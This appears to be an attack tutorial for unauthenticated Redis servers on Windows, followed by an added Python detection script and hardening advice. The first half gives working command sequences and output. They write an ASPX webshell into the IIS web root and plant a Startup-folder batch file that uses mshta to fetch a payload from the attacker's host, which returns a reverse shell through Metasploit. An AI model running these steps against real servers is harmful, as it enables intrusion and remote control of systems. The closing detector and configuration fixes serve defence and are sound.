Connect to the Redis server with the redis client or with telnet:
⚡ root@kali redis/src ./redis-cli -h 192.168.1.124 -p 6379
or
⚡ root@kali ~ telnet 192.168.1.124 6379
After connecting, run info to check the connection and the server details.
Exploitation methods:
1. Write a webshell
⚡ root@kali redis/src ./redis-cli -h 192.168.1.124 -p 6379
192.168.1.124:6379> CONFIG SET dir C:/inetpub/wwwroot
OK
192.168.1.124:6379> CONFIG SET dbfilename evil.aspx
OK
192.168.1.124:6379> set webshell "<%eval request('x')%>"
OK
192.168.1.124:6379> save
2. Reverse shell
First load this module (PS_shell.rb):
msf5 > use exploit/windows/redis/PS_shell
msf5 exploit(windows/redis/PS_shell) > show options
Module options (exploit/windows/redis/PS_shell):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/redis/PS_shell) > set uri
set urihost set uripath set uriport
msf5 exploit(windows/redis/PS_shell) > set urip
set uripath set uriport
msf5 exploit(windows/redis/PS_shell) > set uripath 123456
uripath => 123456
msf5 exploit(windows/redis/PS_shell) > show options
Module options (exploit/windows/redis/PS_shell):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH 123456 no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/redis/PS_shell) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.1.149:4444
[*] Using URL: http://0.0.0.0:8080/123456
[*] Local IP: http://192.168.1.149:8080/123456
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.1.149:8080/123456"
msf5 exploit(windows/redis/PS_shell) >
Then run the following in redis-cli:
192.168.1.131:6379> config set dir "C:/Users/liukaifeng01/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup"
OK
192.168.1.131:6379> config set dbfilename 1.bat
OK
192.168.1.131:6379> config set dbfilename 1.bat
OK
192.168.1.131:6379> set x "\r\n\r\mshta.exe "http://192.168.1.149:8080/123456"\r\n\r\n"
Invalid argument(s)
192.168.1.131:6379> set x "\r\n\r\mshta http://192.168.1.149:8080/123456\rOK\r\n"
192.168.1.131:6379> save
OK
The file has been written successfully.
On our side we manually reboot the target machine, and a shell is returned.
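Both methods above rely on the same primitive: an unauthenticated client changes the dump location with CONFIG SET dir / CONFIG SET dbfilename and then forces a SAVE so that Redis writes attacker-controlled content to disk. The following detector, added here as an example and not part of the original article, turns that sequence into a detection rule. It parses lines in the format Redis MONITOR emits (unix timestamp, database and client address in brackets, then the quoted command arguments), tracks per client whether the dump directory or filename was changed, and raises an alert when that same client then issues SAVE or BGSAVE. The sample log lines are constructed for this example; the extension and directory heuristics are assumptions chosen to flag the web-root and Startup-folder cases shown in this article.

```python
import re
from collections import defaultdict

# Format of a Redis MONITOR line:
#   <unix_ts> [<db> <client_ip:port>] "CMD" "arg1" "arg2" ...
MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Heuristics (assumed for this example): a dump filename with an executable
# extension, or a dump directory that a web server or the OS will run files from.
EXEC_EXTENSIONS = (".aspx", ".asp", ".php", ".jsp", ".bat", ".cmd", ".ps1", ".vbs", ".sh")
EXEC_DIR_HINTS = ("wwwroot", "htdocs", "/var/www", "startup", ".ssh", "cron")


def parse_monitor_line(line):
    """Parse one MONITOR line into ts, client and argv; return None if unparseable."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    argv = ARG_RE.findall(m.group("args"))
    return {"ts": float(m.group("ts")), "client": m.group("client"), "argv": argv}


def detect_rdb_file_writes(lines):
    """Stateful scan: remember CONFIG SET dir/dbfilename per client and alert
    when that client later persists the dataset with SAVE or BGSAVE."""
    pending = defaultdict(dict)  # client -> {"dir": ..., "dbfilename": ...}
    alerts = []
    for line in lines:
        ev = parse_monitor_line(line)
        if not ev or not ev["argv"]:
            continue
        argv, client = ev["argv"], ev["client"]
        cmd = argv[0].upper()
        if cmd == "CONFIG" and len(argv) >= 4 and argv[1].upper() == "SET":
            key = argv[2].lower()
            if key in ("dir", "dbfilename"):
                pending[client][key] = argv[3]
        elif cmd in ("SAVE", "BGSAVE") and pending.get(client):
            changed = pending.pop(client)
            target_dir = changed.get("dir", "<unchanged>")
            filename = changed.get("dbfilename", "<unchanged>")
            reasons = ["dump location changed via CONFIG SET before SAVE"]
            if filename.lower().endswith(EXEC_EXTENSIONS):
                reasons.append("dbfilename has an executable extension")
            if any(hint in target_dir.lower() for hint in EXEC_DIR_HINTS):
                reasons.append("dir points at a web root or autostart location")
            alerts.append({
                "ts": ev["ts"],
                "client": client,
                "path": f"{target_dir}/{filename}",
                "severity": "high" if len(reasons) > 1 else "medium",
                "reasons": reasons,
            })
    return alerts


# Constructed sample MONITOR output: one client reproducing the webshell write
# from this article, a benign client saving normally, and a rename-only save.
SAMPLE_MONITOR = """\
1589000000.100000 [0 192.168.1.149:50001] "CONFIG" "SET" "dir" "C:/inetpub/wwwroot"
1589000000.200000 [0 192.168.1.149:50001] "CONFIG" "SET" "dbfilename" "evil.aspx"
1589000000.300000 [0 192.168.1.149:50001] "SET" "webshell" "<%eval request('x')%>"
1589000000.400000 [0 192.168.1.149:50001] "SAVE"
1589000001.000000 [0 10.0.0.5:40000] "GET" "session:abc"
1589000002.000000 [0 10.0.0.5:40000] "SAVE"
1589000003.000000 [0 192.168.1.149:50002] "CONFIG" "SET" "dbfilename" "backup.rdb"
1589000004.000000 [0 192.168.1.149:50002] "BGSAVE"
""".splitlines()


if __name__ == "__main__":
    for alert in detect_rdb_file_writes(SAMPLE_MONITOR):
        print(f"[{alert['severity']}] {alert['client']} -> {alert['path']}: "
              + "; ".join(alert["reasons"]))
```

Running the script flags the 192.168.1.149:50001 session as high severity (web root plus .aspx filename) and the 50002 session as medium (dump filename changed, then persisted). MONITOR is expensive on a busy instance, so in production the same logic belongs on a proxy or packet capture in front of Redis; the more important fix is to stop the primitive entirely by setting requirepass (or ACLs on Redis 6+), binding to a non-public interface with protected-mode yes, and renaming or disabling CONFIG with rename-command CONFIG "" so an unauthenticated client cannot retarget the dump file in the first place.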